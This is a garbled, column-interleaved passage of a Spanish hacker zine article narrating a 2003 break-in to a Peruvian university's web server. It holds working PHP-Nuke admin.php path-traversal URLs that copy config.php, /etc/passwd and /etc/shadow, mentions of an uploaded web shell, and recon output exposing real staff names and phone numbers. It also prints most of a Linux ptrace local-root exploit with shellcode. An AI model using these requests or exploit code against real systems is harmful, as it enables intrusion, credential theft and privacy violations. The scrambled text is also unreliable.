renombrar o copiar .cash3001 Tocar .cash3001 Borrar .cash3001 # $site_logo: Logo for Printer Friendly Page (It's good to have a Black/White graphic)
Cambiar directorio de trabajo a .font-site .font-site 4k 02-09-2002 07:13:35 Mover, # $slogan: Your site's slogan
# $startdate: Start Date to display in Statistic Page
renombrar o copiar .font-site Tocar .font-site Borrar .font-site
Cambiar directorio de trabajo a .font-size .font-size 4k 20-08-2002 23:48:03 Mover,
renombrar o copiar .font-size Tocar .font-size Borrar .font-size
=======HTMLASCII======= # $adminmail:
# $anonpost:
Site Administrator's Email
Allow Anonymous to Post Comments? (1=Yes 0=No)
# $Default_Theme: Default Theme for your site (See /themes directory for the complete
Cambiar directorio de trabajo a .webmin .webmin 4k 09-09-2002 02:24:04 Mover, renombrar o
copiar .webmin Tocar .webmin Borrar .webmin
Cambiar directorio de trabajo a 0u56wK 0u56wK 4k 23-03-2001 10:10:35 Mover, renombrar o
YaBB SE Installer This program will install list, case sensitive!)
# $foot(x): Messages for all footer pages (Can include HTML code)
# $commentlimit: Maximum number of bytes for each comment
copiar 0u56wK Tocar 0u56wK Borrar 0u56wK
Cambiar directorio de trabajo a 9lhtUe 9lhtUe 4k 23-03-2001 10:11:32 Mover, renombrar o
copiar 9lhtUe Tocar 9lhtUe Borrar 9lhtUe
YaBB SE on your webserver # $anonymous:
# $site_font:
Anonymous users Default Name
Font for your entire site (Comma separated for many fonts type)
# $minpass: Minimum character for users passwords
Cambiar directorio de trabajo a C0hemh C0hemh 4k 23-03-2001 05:59:51 Mover, renombrar o
copiar C0hemh Tocar C0hemh Borrar C0hemh
Cambiar directorio de trabajo a _xvt_txt _xvt_txt 4k 21-11-2002 20:21:12 Mover, renombrar
Install to directory: # $pollcomm: Activate comments in Polls? (1=Yes 0=No)
######################################################################
o copiar _xvt_txt Tocar _xvt_txt Borrar _xvt_txt
Cambiar directorio de trabajo a teknik-uh teknik-uh 4k 08-12-2002 20:01:55 Mover,
renombrar o copiar teknik-uh Tocar teknik-uh Borrar teknik-uh
Create this directory first, then chmod it to 777! $sitename = "Universidad Nacional de Trujillo";
$nuke_url = "http://www.unitru.edu.pe/";
Cambiar directorio de trabajo a x2eJUQ x2eJUQ 4k 23-03-2001 10:11:44 Mover, renombrar o #$site_logo = "logount_blackwhite.gif";
copiar x2eJUQ Tocar x2eJUQ Borrar x2eJUQ
Text h.txt 11.33k 17-03-2003 01:37:21 Move,rename or copy h.txt Touch h.txt Delete h.txt
Overwrite newer files: $slogan = "";

Browse Edit
Text hf.txt 11.33k 17-03-2003 01:50:07 Move,rename or copy hf.txt Touch hf.txt Delete
hf.txt Browse Edit
=======HTMLASCII======= $startdate = "Marzo 2001";
$adminmail = "webmaster@chanchan.unitru.edu.pe";
$anonpost = 1;
=======HTMLASCII======= $Default_Theme = "SlashOcean";
$foot1 = "";
$foot2 = "";
$foot3 = "";

Y si se percatan en todo el caos anterior de códigos $foot4 = " © 2001 UNT.Networks. Todos los derechos reservados.";
$commentlimit = 4096;
Hay que documentarse antes de joderla... sino $anonymous = "An ónimo";

ascii, notaran en la ultima línea, que en /tmp $site_font = "Verdana,Arial,Helvetica";


$minpass = 5;
después?. Fácil instalación, pero no puedo; no $pollcomm = 1;

reside el archivo ‘hf.txt’. Que es lo que en primera ######################################################################


puedo escribir en el directorio... impotencia? ;) # General Stories Options

instancia se perseguía. #
# $top: How many items in Top Page?
# $storyhome: How many stories to display in Home Page?
# $oldnum: How many stories in Old Articles Box?
# $ultramode: Activate ultramode plain text file backend syndication? (1=Yes 0=No Need to
Al menos esto nos sirve para intuir que podríamos chmod 666 ultramode.txt file)

http://www.xfocus.net/exploits/all-unix_phpnuk ######################################################################

tener acceso de escritura al directorio /foro que $top = 10;

e2.txt $storyhome = 5;
$oldnum = 10;
cuelga de la raíz del directorio web; hmmm, $ultramode = 0;

######################################################################
bueno, solo es cuestión de probar y ver los resulta- # Banners/Advertising Configuration

Ahora bien; me enfrento al problema de como #


# $banners: Activate Banners Ads for your site? (1=Yes 0=No)
dos. # $myIP: Write your IP number to not count impressions, be fair about this!
######################################################################
diantres visualizo el contenido del archivo?. Que $banners = 0;
$myIP = "150.10.10.10";
vaina tío!!!. Ya lo copie, pero ahora como lo leo?...
Ahora bien... pienso... Entonces puedo copiar el ######################################################################
# XML/RDF Backend Configuration
Si no puedo escribir en el directorio web... piensa... #
config.php a este directorio; con otro nombre; y # $backend_title: Backend title, can be your site's name and slogan
# $backend_language: Language format of your site
mejor dicho pienso... Mientras pienso un telnet al # $backend_image: Image logo for your site
listo!... podría leer vía petición al puerto 80 su # $backend_width:
# $backend_height:
Image logo width
Image logo height
port 80 y de Paso le pregunto a “Buanzo” o “Shad- ######################################################################
contenido. Todo :O) $backend_title = "Universidad de Trujillo";
own”, haber si me dan alguna idea... ;) $backend_language = "en-us";
$backend_image = "http://www.unitru.edu.pe/portal/images/logo.gif";
$backend_width = 88;
$backend_height = 31;

--> http://200.60.44.6/admin.php?upload=1&file=con ######################################################################


Connected to 200.60.44.6. # Site Language Preferences
Escape character is '^]'.
GET / HTTP/1.1\r\n\r\n
fig.php&file_name=p.txt&wdir=/../../tmp/&user #
# $language: Language of your site (You need to have lang-xxxxxx.php file for your
selected language in the /language directory of your site)

HTTP/1.1 400 Bad Request


file=config.php&userfile_name=p.txt # $locale: Locale configuration to correctly display date with your country format. (See
/usr/share/locale)
######################################################################
Date: Tue, 18 Mar 2003 04:36:10 GMT
Server: Apache/1.3.19 (Unix) PHP/4.0.4pl1 $language = "spanish";
Connection: close $locale = "en_US";
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Con la misma técnica anterior pero ahora apun- ######################################################################
# Web Links Preferences

173
tando a /foro. #
# $perpage: How many links to show on each page?
# $popular: How many hits need a link to be listed as popular?
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
--> # $newlinks:
# $toplinks:
How many links to display in the New Links Page?
How many links to display in The Best Links Page? (Most Popular)
<TITLE>400 Bad Request</TITLE> Index of /foro # $linksresults: How many links to display on each search result page?
# $links_anonaddlinklock: Let Anonymous users to post new links? (1=Yes 0=No)
</HEAD><BODY> ######################################################################
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Name Last modified Size Description $perpage = 10;
$popular = 10;
client sent HTTP/1.1 request without hostname (see RFC2616 section $newlinks = 10;
14.23): /<P> [DIR] Parent Directory 24-Feb-2003 23:47 - $toplinks = 10;
<HR> $linksresults = 10;
<ADDRESS>Apache/1.3.19 Server at aries.unitru.edu.pe Port
[ ] install.php 18-Feb-2003 03:08 18k $links_anonaddlinklock = 1;
80</ADDRESS> [TXT] p.txt 18-Mar-2003 01:11 11k
</BODY></HTML> [ ] yse150.ya 18-Feb-2003 03:09 1.8M ######################################################################
<-- # Notification of News Submissions
#
Apache/1.3.19 Server at aries.unitru.edu.pe Port 80 # $notify:
# $notify_email:
Notify you each time your site receives a news submission? (1=Yes 0=No)
Email, address to send the notification
<-- # $notify_subject: Email subject
# $notify_message: Email body, message
Alguien dijo Chunked Enconding? :-O # $notify_from: account name to appear in From field of the Email
######################################################################
Se me olvido pegar el enlace... Bueno, espero $notify = 0;
$notify_email = "webmaster@chanchan.unitru.edu.pe";
acordarme si no me avisan. ;) $notify_subject = "Novedades para www.unitru.edu.pe";
Ahora husmeo un poco mas... Voy a mirar los $notify_message = "Oye!, tienes un nuevo envio de informacion para tu sitio web.
";
Extraordinario!!!. ;) Allí esta mi ‘p.txt’ que contiene $notify_from = "webmaster";

directorios... veremos que se puede encontrar; uno ######################################################################


al ‘config.php’. # Moderation Config (not 100% working)

nunca sabe... y encuentro lo siguiente; no después #


# $moderate: Activate moderation system? (1=Yes 0=No)

Por un tema de formato el archivo fué pegado # $resons: List of reasons for the moderation (each reason under quotes and comma

de haber recorrido por buen rato el sistema. separated)


# $badreasons: Number of bad reasons in the reasons list

como gráfico, ######################################################################

$moderate = 0;
$reasons = array("As Is",

http://aries.unitru.edu.pe/forøinstall.php "Offtopic",
"Flamebait",
"Troll",
"Redundant",
"Insighful",
"Interesting",
"Informative",
Oh mi god!... "Funny",
"Overrated",
"Underrated");
$badreasons = 4;

Lo que hagas en la vida, tendrá eco en la eternidad. 17


S E C U R I T Y W A R I P R O J E C T S
######################################################################
# Survey/Polls Config Luego indagando con mi amigo ‘Amigo’; me men- uname -a
Linux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686 unknown
#
# $maxOptions: Number of maximum options for each poll
# $BarScale: Scale for the Bar, multiple of 100, You may leave this to 1 cionó lo de una shell ciega; entonces me entró más finger
No one logged on.
# $setCookies: Set cookies to prevent visitors vote twice in a period of 24 hours?
(1=Yes 0=No)
###################################################################### la curiosidad. Y como ya había mirado el phpshell w
9:48am up 6 days, 44 min, 0 users, load average: 0.04, 0.01, 0.00
$maxOptions = 12;
$BarScale = 1; anterior, pues necesitaba algo que funcionara USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
$setCookies = 1;

######################################################################
mejor. Y encontre un link de un código que per- Vemos ahora los procesos que existen en el server, solo para darse una
idea que es lo que tenemos aquí.
# Some Graphics Options
#
# $tipath: Topics images path (put / only at the end, not at the begining)
mite subir files; será cuestion de probar si fun- ps axu
# $userimg: User images path (put / only at the end, not at the begining)
-->
# $adminimg:
begining)
Administration system images path (put / only at the end, not at the ciona, cuando el server este UP :) upsss!. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 344 52 ? S Mar12 0:04 init [3]
# $admingraphic: Activate graphic menu for Administration Menu? (1=Yes 0=No) root 2 0.0 0.0 0 0 ? SW Mar12 0:00 [keventd]
# $admart: How many articles to show in the admin section? root 3 0.0 0.0 0 0 ? SW Mar12 0:05 [kswapd]
###################################################################### root 4 0.0 0.0 0 0 ? SW Mar12 0:00 [kreclaimd]
$tipath = "images/topics/"; root 5 0.0 0.0 0 0 ? SW Mar12 0:23 [bdflush]
$userimg = "images/menu/"; root 6 0.0 0.0 0 0 ? SW Mar12 0:32 [kupdate]
$adminimg = "images/admin/"; bin 86 0.0 0.0 1088 4 ? S Mar12 0:00 /sbin/rpc.portmap
$admingraphic = 1;
$admart = 20;
http://www.der-keiler.de/Mailing-Lists/securityf root 90 0.0 0.3 1368 208 ? S Mar12 0:01 /usr/sbin/syslogd
root 93 0.0 0.7 1624 496 ? S Mar12 0:00 /usr/sbin/klogd -
######################################################################
# HTTP Referers Options
ocus/bugtraq/2001-10/0017.html root 95 0.0 0.3 1360 216 ? S Mar12 0:00 /usr/sbin/inetd
root 97 0.0 0.0 1396 4 ? S Mar12 0:00 /usr/sbin/lpd
# root 99 0.0 0.1 1720 72 ? S Mar12 0:00 /usr/sbin/rpc.mou
# $httpref: Activate HTTP referer logs to know who is linking to our site? (1=Yes ...
0=No)# $httprefmax: Maximum number of HTTP referers to store in the Database (Try to Líneas y líneas --> Omitiendo...
not set this to a high number, 500 ~ 1000 is Ok)
###################################################################### Una vez que el server esta UP probe con éste file: ...
root 4845 0.0 5.0 13308 3188 ? S Mar17 0:02 /usr/local/mysql/
$httpref = 1; nobody 5645 0.0 2.1 3272 1360 ? S 09:48 0:00 /www/bin/httpd
$httprefmax = 1000; nobody 5646 0.0 2.1 3272 1368 ? S 09:48 0:00 /www/bin/httpd
nobody 5649 0.0 2.2 3280 1384 ? S 09:48 0:00 /www/bin/httpd
######################################################################
# Allowable HTML tags PHP-Nuke xploit by RoMaNSoFt; el cual contiene nobody 5650 0.4 4.2 4304 2664 ? S 09:48 0:00 /www/bin/httpd
nobody 5651 0.5 4.5 4480 2832 ? S 09:48 0:00 /www/bin/httpd
# root 5652 0.1 5.0 13308 3188 ? S 09:48 0:00 /usr/local/mysql/
# $AllowableHTML: HTML command to allow in the comments
# =>2 means accept all qualifiers: <foo bar>
los archivos necesarios para correr una shell. root 5657 1.0 5.0 13308 3188 ? S 09:49 0:00 /usr/local/mysql/
# =>1 means accept the tag only: <foo> nobody 5658 0.0 1.1 1560 712 ? S 09:49 0:00 sh -c ps axu 2>&1
###################################################################### nobody 5659 0.0 1.7 2740 1092 ? R 09:49 0:00 ps axu
<--
$AllowableHTML = array("p"=>2, =======HTMLASCII=======
"b"=>1,
"i"=>1, Manejador de Archivos
"a"=>2,
"em"=>1,
"br"=>1, El Directorio Actual es: /foro/ Allí está mi shell; soy nobody ;) Bueno; si me cono-
"strong"=>1, [ Volver al raiz | Recargar ]
"blockquote"=>1,
"tt"=>1, cieran es algo así :). Pero sigamos con ésto que se
"li"=>1, Subido cmd.html --> /foro/
"ol"=>1,
"ul"=>1); esta poniendo interesante.
###################################################################### Tipo Nombre Tamaño Modificado Acción
# Miscelaneous Options Directorio superior 8k Directorio superior
# Web page cmd.html 138b 18-03-2003 09:39:49 Move,rename or copy netstat -tn
# $Ephemerids: Activate Ephemerids (Past Events) system? (1=Yes 0=No)
# $advancedstats: Activate Advanced Stats? (1=Yes 0=No This will display a new box in
cmd.html Touch cmd.html Delete cmd.html Browse Edit
Statistics page with relevant server info) Web program install.php 17.93k 18-02-2003 03:10:00 Move,rename or -->
###################################################################### copy install.php Touch install.php Delete install.php Browse Edit Active Internet connections (w/o servers) Proto Recv-Q Send-Q
Text p.txt 928b 18-03-2003 01:28:04 Move,rename or copy p.txt Touch Local Address
$Ephemerids = 0;
$advancedstats = 0;
p.txt Delete p.txt Browse Edit Foreign Address State
Unknown filetype yse150.ya 1.78m 18-02-2003 03:10:02 Move,rename or tcp 0 0 200.60.44.6:80 200.60.220.209:1616 TIME_WAIT
copy yse150.ya Touch yse150.ya Delete yse150.ya Browse Edit tcp 0 0 200.60.44.6:80 200.60.220.209:1624 ESTABLISHED
tcp 0 11680 200.60.44.6:80 200.60.215.60:1760 ESTABLISHED
=======HTMLASCII=======
###################################################################### tcp 0 1 200.60.44.6:4212 195.50.191.14:6668 SYN_SENT
# Filters Options (not working yet) tcp 0 0 200.60.44.6:80 200.**0.20*.1**:39382 ESTABLISHED
######################################################################
tcp 0 0 200.60.44.6:80 200.60.215.60:1758 ESTABLISHED
$MaxTextLength = 0; <--
$MaxTotalLength = 0;
$CensorList = array("fuck",
"cunt",
"fucker",
"fucking",
"pussy", Allí tambien aparece mi IP :O) Hay que visitar los
"cock",
"c0ck", Ya tenemos subido el archivo ‘cmd.html’
"cum",
"twat",
logs creo yo, pero tranquilos. :)
"clit",
"bitch",
"fuk",
"fuking",
"motherfucker");
Veamos... ;) claro que antes hay que tocar algunos netstat -pl

$CensorMode = 1; -->
$CensorReplace = "*"; parámetros allí; como el nombre del host y el di- (Not all processes could be identified, non-owned process info will
###################################################################### not be shown, you would have to be root to see it all.)
# Do not touch the following options!
######################################################################
rectorio en el cual podemos escribir... wait... Active Internet connections (only servers) Proto Recv-Q Send-Q Local
Address
$cookieadmtime = 2592000;
$cookiePrefix = "NukePoll";
Primero subimos ‘cmd.html’, luego ‘rs.php’. Y Foreign Address State PID/Program name
tcp 0 0 *:24000 *:* LISTEN 4822/"httpd"
$uimages = "$userimg$language"; tcp 0 0 *:2049 *:* LISTEN -
$Version_Num = "4.4"; luego BROWSEamos el ‘phpnuker.html’ en nues- tcp 0 0 *:printer *:* LISTEN -
######################### tcp 0 0 *:3306 *:* LISTEN -
# Show a number of user #
#########################
tro localhost. tcp 0 0 *:sunrpc *:* LISTEN -
tcp 0 0 *:www *:* LISTEN 4822/"httpd"
$show_user= 20;# How many users to display in admin section?
tcp 0 0 *:ftp *:* LISTEN -
tcp 0 0 *:6006 *:* LISTEN -
?> tcp 0 0 *:telnet *:* LISTEN -
<-- Aja... todo funciona OK!... Gracias a estos files tcp 0 0 *:703 *:* LISTEN -
udp 0 0 *:2049 *:* -
podemos listar con los permisos adecuados, los udp 0 0 *:700 *:* -
Right!!! Seguimos esto; está tornandose tormen- udp 0 0 *:sunrpc *:* -
raw 0 0 *:tcp *:* 7 -
directorios y archivos de una manera mas elegante Active UNIX domain sockets (only servers) Proto
toso. Pero para no perder la costumbre. RefCnt Flags Type State I-Node PID/Program name Path
;). Una buena shell ciega. unix 2 [ ACC ] STREAM LISTENING 309 - /dev/log
unix 2 [ ACC ] STREAM LISTENING 336 - /dev/printer
unix 2 [ ACC ] STREAM LISTENING 400 - /tmp/mysql.sock
<--
http://200.60.44.6/admin.php?upload=1&file=con
Por ejemplo le damos un ls -l
fig.php&file_name=p.txt&wdir=/forø&userfile=../
../etc/passwd&userfile_name=p.txt --> Borramos algunas huellitas ;)
total 101
drwxr-xr-x 2 root bin 4096 Sep 5 1999 bin ls -l /www/htdocs/
drwxr-xr-x 4 root root 1024 Mar 23 2001 boot
Quiero las claves! =). Esto es un clásico! 8) drwxr-xr-x 2 root root 4096 Oct 6 1997 cdrom -->
drwxr-xr-x 5 root root 28672 Mar 12 09:04 dev total 47504
-rw-r--r-- 1 root root 20879360 Oct 31 2001 -d
--> drwxr-xr-x 2 root root 4096 Nov 29 2001 disquete -rw-r--r-- 1 root root 6046 Aug 26 2001 092001php01.htm
root:x:0:0::/root:/bin/bash
toor:x:0:0::/root:/bin/false drwxr-xr-x 19 root root 4096 Mar 12 09:04 etc -rw-r--r-- 1 root root 5210 Aug 26 2001 092001php02.htm
bin:x:1:1:bin:/bin: drwxr-xr-x 8 root root 4096 Feb 12 02:28 home -rw-r--r-- 1 jchong users 347567 Dec 23 10:18 422.gif
daemon:x:2:2:daemon:/sbin: -rw-r--r-- 1 root root 91 Jul 16 2001 Copia de cl.gif
adm:x:3:4:adm:/var/log: drwxr-xr-x 3 root root 4096 Sep 6 1999 lib -rw-r--r-- 1 root root 39308 Jul 16 2001 Copia de grifo2.jpg
lp:x:4:7:lp:/var/spool/lpd: drwxr-xr-x 2 root root 16384 Mar 22 2001 lost+found -rw-r--r-- 1 root root 300 Jul 16 2001 Copia de result.gif
sync:x:5:0:sync:/sbin:/bin/sync -rw-r--r-- 1 root root 1386 Jul 16 2001 Copia de wmail.gif
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
drwxr-xr-x 2 root root 4096 Oct 6 1997 mnt
drwxr-xr-x 3 root root 4096 Oct 9 2001 XICONEE
halt:x:7:0:halt:/sbin:/sbin/halt dr-xr-xr-x 65 root root 0 Mar 12 04:03 proc drwxr-xr-x 3 root root 4096 Jul 4 2001 actividades
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
drwx--x--- 5 root root 4096 Feb 22 10:25 root drwxrwxrwx 2 root root 4096 Mar 15 01:12 admin
uucp:x:10:14:uucp:/var/spool/uucppublic: drwxr-xr-x 2 root bin 4096 Oct 19 19:23 sbin -rw-rw-rw- 1 root root 40789 Nov 26 2001 admin.php
operator:x:11:0:operator:/root:/bin/bash drwxr-xr-x 20 root root 4096 Feb 22 12:21 admision
games:x:12:100:games:/usr/games:
drwxr-xr-x 2 root root 4096 Apr 28 1996 shlib -rw-r--r-- 1 eponte users 2253 Feb 19 01:19 admision2001.pgdump
ftp:x:14:1::/home/ftp:/bin/bash drwxrwxrwt 14 root root 4096 Mar 18 09:43 tmp drwxr-xr-x 2 root root 4096 Jun 25 2002 ali
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash drwxr-xr-x 23 root root 4096 Oct 19 19:23 usr drwxr-xr-x 2 root root 4096 Aug 26 2001 app
nobody:x:99:99:nobody:/: drwxr-xr-x 2 root root 4096 Feb 23 2002 app1
dwong:x:1000:100:David Wong,,,:/home/dwong:/bin/bash drwxr-xr-x 17 root root 4096 May 28 2000 var drwxr-xr-x 2 root root 4096 Mar 26 2001 archivos
mysql:x:1001:102::/home/mysql: drwxr-xr-x 14 root root 4096 Oct 10 08:23 www drwxr-xr-x 10 root root 8192 Jan 31 02:24 arq
webmaster:x:1002:100:Webmaster Op.,,,:/www/htdocs/webnew:/bin/bash ...
jchong:x:1003:100:Juan Chong,,205015,222007,652252:/home/jchong:/bin/bash <--
Líneas y líneas --> Omitiendo...
kayluss:x:1004:100:Juan Chong,,205015,222007,652252:/home/kayluss:/bin/bash
eponte:x:1005:100:Edward Ponte ...
Haro,Sistemas,233383,210498:/home/eponte:/bin/bash -rw-r--r-- 1 webmaste users 19598 Feb 11 02:20 unt.jpg
<-- -rw-r--r-- 1 root root 156013 Mar 19 2002 untanimation.swf
Ya tengo mi shell ;) Los formatos de texto lo he drwxr-xr-x 5 root root 4096 Oct 31 2001 untred
drwxrwxrwx 2 root root 4096 Feb 12 2001 upgrades
hecho yo; pues sale como el protocolo y Dios -rw-rw-rw- 1 root root 52155 Feb 16 2001 user.php
-rw-rw-rw- 1 root root 12051 Feb 16 2001 viewforum.php
-rw-rw-rw- 1 root root 6512 Mar 26 2001 viewpmsg.php
manda; es decir SIN formato. :D -rw-rw-rw- 1 root root 6516 Mar 25 2001 viewpmsg.php.ok
toor? Que toor no era el Dios del Trueno? ;) Vea- -rw-rw-rw- 1 root -root 13586 Feb 8 2001 viewtopic.php
-rw-r--r-- 1 root root 218 Jul 16 2001 vote.gif
-rw-rw-rw- 1 root root 5018 Feb 8 2001 voteinclude.php
mos... No se; como que creo que sería buena idea drwxr-xr-x 2 root root 4096 Jul 16 2001 web
drwx--x--x 13 webmaste users 4096 Mar 14 02:48 webnew
parar la mano. Dejenme pensarlo... NO! :) -rw-r--r-- 1 root root 2107 Mar 19 2002 webunt.html
-rw-r--r-- 1 root root 287227 Jul 11 2001 webuntx.swf
http://200.60.44.6/admin.php?upload=1&file=con -rw-r--r-- 1 root root 68 Jul 16 2001 wl.gif
-rw-r--r-- 1 root root 68 Jul 16 2001 wl_cccccc.gif
-rw-r--r-- 1 root root 1386 Jul 16 2001 wmail.gif
fig.php&file_name=p.txt&wdir=/forø&userfile=../ -rw-r--r-- 1 root root 82 Jul 16 2001 wr.gif
-rw-r--r-- 1 root root 82 Jul 16 2001 wr_cccccc.gif
../etc/shadow-&userfile_name=p.txt <--

:o)

18 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

Con este completo listado, ya tengo una idea de /tmp/_xvt_txt/super.tar.gz #include


#include
<grp.h>
<stdio.h>
#include <fcntl.h>
los permisos en los archivos; el uso de una shell /tmp/_xvt_txt/_tbd #include <errno.h>
#include <paths.h>
clarifica el asunto. Notaron las joyas que hay por /tmp/_xvt_txt/_tbd/eggdrop-1.6.10 #include
#include
<string.h>
<stdlib.h>
#include <signal.h>
alli? #include <unistd.h>
#include <sys/wait.h>
Eggdrop? Haber miro un file.... Interesante.... #include
#include
<sys/stat.h>
<sys/param.h>
#include <sys/types.h>
Un defaced???... No lo creo!!!.... ]:) #include <sys/ptrace.h>
#include <sys/socket.h>
cat /tmp/_xvt_txt/_tbd/the.chan #include <linux/user.h>
finger
char cliphcode[] =
"\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
Login Name Tty Idle Login Time Office Office Phone "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
eponte Edward Ponte Haro pts/0 1:13 Mar 19 00:34 (200.60.44.11) -->
Dynamic Channel File for TheChemis (eggdrop v1.6.10) -- written Mon "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
Dec 2 "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
w "\x40\xcd\x80\xe8\xdc\xff\xff\xff";
02:07:50 2002 channel set #chembot chanmode +tn-klim idle-kick 0
1:59am up 6 days, 16:55, 1 user, load average: 0.01, 0.01, 0.00 stopnethack-mode 0 revenge-mode 1 need-op {time_chanserv #chembot}
#define CODE_SIZE (sizeof(cliphcode) - 1)
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT need-invite { putserv "PRIVMSG chanserv@services.dal.net :invite
eponte pts/0 200.60.44.11 12:34am 1:14m 0.44s ? - #chembot pid_t parent = 1;
$botnick" } need-key { putserv "PRIVMSG #chembot :let me in!" } need- pid_t child = 1;
ps axu | grep eponte unban { pid_t victim = 1;
putserv "PRIVMSG chanserv@services.dal.net :unban #chembot $botnick" volatile int gotchild = 0;
eponte 6092 0.0 1.6 1760 1032 pts/0 S 00:34 0:00 -bash }
nobody 6463 0.0 0.7 1168 448 ? S 02:00 0:00 grep eponte need-limit { putserv "PRIVMSG #chembot :let me in!" } flood-chan void fatal(char * msg)
10:60 {
Allí estoy yo!!! ;) nobody!!! flood-ctcp 3:60 flood-join 5:60 flood-kick 3:10 flood-deop 3:10 perror(msg);
flood-nick kill(parent, SIGKILL);
netstat -tn 5:60 aop-delay 5:30 +enforcebans +dynamicbans +userbans -autoop - kill(child, SIGKILL);
bitch +greet kill(victim, SIGKILL);
--> +protectops +protectfriends +dontkickops +statuslog +revenge }
Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local +revengebot
+autovoice -secret -shared +cycle +seen void putcode(unsigned long * dst)
Address
<-- {
Foreign Address State char buf[MAXPATHLEN + CODE_SIZE];
tcp 0 10089 200.60.44.6:80 200.60.201.73:19754 FIN_WAIT1 unsigned long * src;
tcp 0 0 200.60.44.6:23 200.60.44.11:1604 ESTABLISHED int i, len;
tcp 0 1 200.60.44.6:1842 209.221.59.49:6669 SYN_SENT
tcp 1 0 200.60.44.6:80 200.**0.2**.1**:37596 CLOSE_WAIT memcpy(buf, cliphcode, CODE_SIZE);
tcp 0 0 200.60.44.6:80 200.60.242.186:3824 ESTABLISHED
tcp 0 11680 200.60.44.6:80 200.60.201.73:19807 ESTABLISHED /tmp/.font-size len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
if (len == -1)
tcp 1 0 200.60.44.6:80 200.60.208.157:35486 CLOSE_WAIT fatal("[-] Unable to read /proc/self/exe");
tcp 0 0 200.60.44.6:23 200.37.192.187:3641 ESTABLISHED /tmp/.font-size/psy.gz
tcp 0 0 200.60.44.6:80 200.60.208.157:37598 ESTABLISHED len += CODE_SIZE + 1;
tcp 0 597 200.60.44.6:80 200.60.233.156:3966 ESTABLISHED
<--
/tmp/.font-size/psybnc buf[len] = '\0';

src = (unsigned long*) buf;


/tmp/.font-size/psybnc/help for (i = 0; i < len; i += 4)
if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
/tmp/.font-size/psybnc/help/ADDLOG.TXT }
fatal("[-] Unable to write shellcode");

Yo pense que no había telnet ;)


void sigchld(int signo)
psybnc??? {
struct user_regs_struct regs;
Login: eponte Name: Edward Ponte Haro
Directory: /home/eponte Shell: /bin/bash if (gotchild++ == 0)
Office: Sistemas, 233383 Home Phone: 210498 return;
On since Wed Mar 19 00:34 (PET) on pts/0 from cat /tmp/_xvt_txt/psybnc/log/USER3.LOG fprintf(stderr, "[+] Signal caught\n");
200.60.44.11 1 hour 28 minutes
idle No mail. No Plan. if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
--> fatal("[-] Unable to read registers");
Sun Sep 15 14:52:51 :(akusemua!XNet5@202.158.54.171) n iq ~Sun Sep 15
14:58:38 :(AhhhMeong!~desy@202.59.196.200) haiiiii....nun ~Sun Sep 15 fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
15:08:10 :(capunk!~moj3nk_12@202.158.97.186) alllooo??? ~Sun Sep 15 15:30:11
:(MemoServ!service@dal.net) You have 28 new memos. To list them, use: /msg putcode((unsigned long *)regs.eip);
MemoServ@services.dal.net LIST ~Sun Sep 15 15:49:57
:(co_kenzo!~ayung@202.155.16.212) hi ~Sun Sep 15 16:51:22 fprintf(stderr, "[+] Now wait for suid shell...\n");
:(Marine`Inspector!~ocean@202.95.145.10) hay ~Sun Sep 15 19:17:37
:(Aquarius_Boys!~febe@202.155.106.164) hi ~Sun Sep 15 21:37:28
if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
No plan? ;) :(kuncup!_saktie_@202.149.73.37) helloooooooo ~Sun Sep 15 21:49:47
:(W15NU!~Love2000@202.162.36.3) alloo ~Sun Sep 15 21:56:06 fatal("[-] Unable to detach from victim");
:(reyyuka!~goesonk@202.58.198.14) hai ~Mon Sep 16 01:18:20
:(Co_cr_Ce!~LoveRara@202.95.138.29) alow ~Mon Sep 16 01:21:52 exit(0);
:(ijoey!~user@202.152.156.203) hiiiiiii..... ~Mon Sep 16 01:25:53 }
ls -l /etc/ :(DEO^!~LoveRara@202.152.230.50) hallo ~Mon Sep 16 02:10:52
:(C-HUMOR!~Issandy@202.95.145.78) hay ~Mon Sep 16 02:25:45 void sigalrm(int signo)
--> :(cutezs!GekMas@61.5.76.41) ada orang??? ~Mon Sep 16 02:25:53 {
total 1292 :(cutezs!GekMas@61.5.76.41) apa bot??? ~Mon Sep 16 02:25:55 errno = ECANCELED;
:(cutezs!GekMas@61.5.76.41) ;p ~Mon Sep 16 02:27:12 fatal("[-] Fatal error");
-rw-r--r-- 1 root root 1117 Aug 19 1999 AppleVolumes.default :(alee_fash!asdfljk@202.95.145.60) hi ~Mon Sep 16 02:27:17
-rw-r--r-- 1 root root 993 Aug 19 1999 AppleVolumes.system }
...
-rw-r--r-- 1 root root 2369 Sep 27 1999 DIR_COLORS Líneas y líneas --> Omitiendo... void do_child(void)
-rw-r--r-- 1 root root 20 Jan 21 2002 HOSTNAME ...
{
-rw-r--r-- 1 root root 4 Feb 23 1993 NETWORKING :(akhi_andre!~ic_ha2003@216.6.3.17) ini padang? ~Sun Oct 13 23:08:13 int err;
-rw-r--r-- 1 root root 48 Mar 12 09:03 adjtime :(Assalam!~M06@202.152.27.179) Assalamu'alaikum? ~Sun Oct 13 23:15:05
-rw-r--r-- 1 root root 1707 Aug 19 1999 afpd.conf :(Assalam!~M06@202.152.27.179) hallo? ~Sun Oct 13 23:29:53 child = getpid();
